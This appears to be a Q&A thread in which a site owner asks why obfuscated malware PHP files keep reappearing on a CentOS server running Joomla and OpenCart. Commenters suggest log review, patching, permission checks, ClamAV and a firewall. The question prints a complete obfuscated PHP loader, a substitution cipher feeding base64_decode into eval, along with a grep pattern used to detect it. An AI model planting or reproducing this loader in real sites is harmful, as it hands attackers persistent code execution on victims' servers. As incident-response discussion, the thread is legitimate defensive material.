# Malware PHP files are getting created automatically

Tags: php, joomla, amazon-ec2, centos, opencart

We have AWS ec2 instance with CentOs. There are 4 sites hosted on this instance, one static HTML and PHP site, two Joomla (v3.4.5), one Opencart (v2.0.1.1).

Yesterday we found few files which are not related to our codebase, seems malware. We executed `egrep -Rl 'function.*for.*strlen.*isset' /home/` and found that there are few files with following sample code.

```
<?php
function rjlynu($vkofjapoz, $avsepejks){$gjcdh = ''; for($i=0; $i < strlen($vkofjapoz); $i++){$gjcdh .= isset($avsepejks[$vkofjapoz[$i]]) ? $avsepejks[$vkofjapoz[$i]] : $vkofjapoz[$i];}
$jcmkpl="base64_decode";return $jcmkpl($gjcdh);}
$fkcrhcwlxx = 'KAYS3ymsuxKqMLBk10JIDxYauxMVX0MsMVddThITKAYS3ymsuxKqML5HupmY18MH18F8EcNkldkNuxMV'.
'X0Ma1fydX0MQ3Z98TcNkldkN1LyQx0BkXZyaXAYC3xKqF4bn4bJkuL9H1fyatxG'.
'Y1YmPDfmVt4w5ThITKAYS3ymsuxKqMLpP26mY2Ay7txBkXL9atAYCuz1IF4bn4wkkueNqtfyV1'.
'LYHXYm7XLpdDxMYT6JOR6mZByMhzRmlE4N8GzrdE7N8E4N8v41kO4bw2dqw'.
'O4BVuxFwvzJJ18MP2zwkldqwO4BVuxGXO8MY10yIt4MtZVM73Ay73VMtOcQwFcITO4JYDLPHOAMP1LRLG6mYXf'.
'GHuARq1LyV3Z6I3xkYT4BVuxFkThITaKqTu8ySD0BkXLrwD0ystAmCx0GQ1fYdx0BPu0FqMiBY2'.
'iKk48ITO4NwO4BQuxPQOcQw10BV3xJatA681VwbtAyrt4dwMs5Pve'.
'1kldqTO4NwO4BQuxPQOcQw10BVx0MY1A5PDLRqO75POAPVuZDmx4OeE4NeZVNeE4NbtAyrt4'.
'bn4eNwO4NbtAyrt4NmOiGQ1YmVuxJIDZGYT4OWELU+OedwOeOIO4BQuxPQThITO4NwO4BQ'.
'uxPQOcQw10BVx0MY1A5PDLRqOYdeveOIO4OwxzNeE4NbtAyrt4bn4wqwO4Nw1fyQtxMSO4BQux'.
'PQldkm4wk7XA6s1VJhhyBKOiITO4JdtZMI3ZFwM6GGy6JaRUmzy4NmOcOpldqwOiJpDf5kDVNbKpMFBe'.
'NmO4M11Y5SO7ITO4JdtZMI3ZFwMABHxLBYD8y8OcQwFcITO4JdtZMI'.
'3ZFwMUBYD8y8X0yQ1iyQO4NwO4NmO4tYDLPHMsITO4JdtZMI3ZFwMABHx0uY18NwvzJfDZ5suhITO4JdtZMI3ZFwM6BkXZyHtxK'.
'wO4NwO4NwO4NmOcUpldqwOiJpDf5kDVNbyAYCuZ5kXZYQO4NwO'.
'MY10yIt4MtZVM73Ay73VMtOcQwFhIT4fy73AWwDf6suhDQxLySDLmbuzPsuxMkDZ5k2fRqMiMY1VbkldqTu'.
'xPkt4wkld==';
$ghjnzmrjlg = Array('1'=>'c', '0'=>'3', '3'=>'a', '2'=>'e', '5'=>'x', '4'=>'C', '7'=>'j', '6'=>'F', '9'=>'5', '8'=>'n', 'A'=>'G', 'C'=>'t', 'B'=>'R', 'E'=>'L', 'D'=>'Y', 'G'=>'N', 'F'=>'M', 'I'=>'s', 'H'=>'v', 'K'=>'Q', 'J'=>'B', 'M'=>'J', 'L'=>'2', 'O'=>'I', 'N'=>'A', 'Q'=>'0', 'P'=>'h', 'S'=>'u', 'R'=>'U', 'U'=>'E', 'T'=>'K', 'W'=>'8', 'V'=>'y', 'Y'=>'l', 'X'=>'b', 'Z'=>'W', 'a'=>'f', 'c'=>'D', 'b'=>'k', 'e'=>'i', 'd'=>'w', 'g'=>'6', 'f'=>'m', 'i'=>'H', 'h'=>'T', 'k'=>'p', 'j'=>'r', 'm'=>'9', 'l'=>'O', 'o'=>'q', 'n'=>'7', 'q'=>'o', 'p'=>'1', 's'=>'z', 'r'=>'4', 'u'=>'Z', 't'=>'d', 'w'=>'g', 'v'=>'P', 'y'=>'V', 'x'=>'X', 'z'=>'S');
eval(rjlynu($fkcrhcwlxx, $ghjnzmrjlg));?>
```

Even if we remove these files, they get created again and again.

What could be the issue? How can we find the root cause behind this and what is the permanent solution?

Thanks

Comment: Your site has been hacked. Check your web logs to locate the "leak" or vulnerability in your CMSs and patch it ASAP.

Comment: @macl: That's the problem, i am not getting exactly what should I look for in the logs? Any specific suggestion?

Comment: Your Joomla seems updated, but Opencart version is almost 1 year old. Anyway, it could be any extension of your CMS. I would look in the logs for repeating URLs from the same IP (or IP blocks, script kiddies normally use proxies to mask their attacks), requests made at odd times of the day, and some other files, hidden in your directory structure, which should not be there, or modified in recent dates (find . -mtime +7, for example). There is no exact recipee.

Comment: This will require a heavy audit. Firstly replacing Joomla! core files with a fresh versions, then a scan for vulnerable files and update all components/plugins and modules. And once done, implement a site firewall.

Comment: @XWS: Joomla! is already a latest version, Do I have to still replace core files with fresh versions? I can upgrade the components/plugins. Also there is opencart and static site too. We are still not sure which site has been hacked. Can you share some links for implementation of site firewall?

Comment: Yes as standard because your site has been hacked, you don't know what's been touched. It is simple just to replace the Joomla! Files as a precaution. You will also need to update opencart too, as for a Joomla! Firewall look at Akeeba Admin tools: https://www.akeebabackup.com/products/admin-tools.html

Answer (score 0):

lookup access log i believe they are located here `/var/log/apache2/access.log`
 i would also check the folder permission make sure its not something like 777. i would also check for the processes using the `ps` command from ssh to watch the processes that are running. 
i also would make sure to run ClamAV. before all of that i would also make backups of all of the sites and upgrade every plugin you have installed. 
good luck with your server.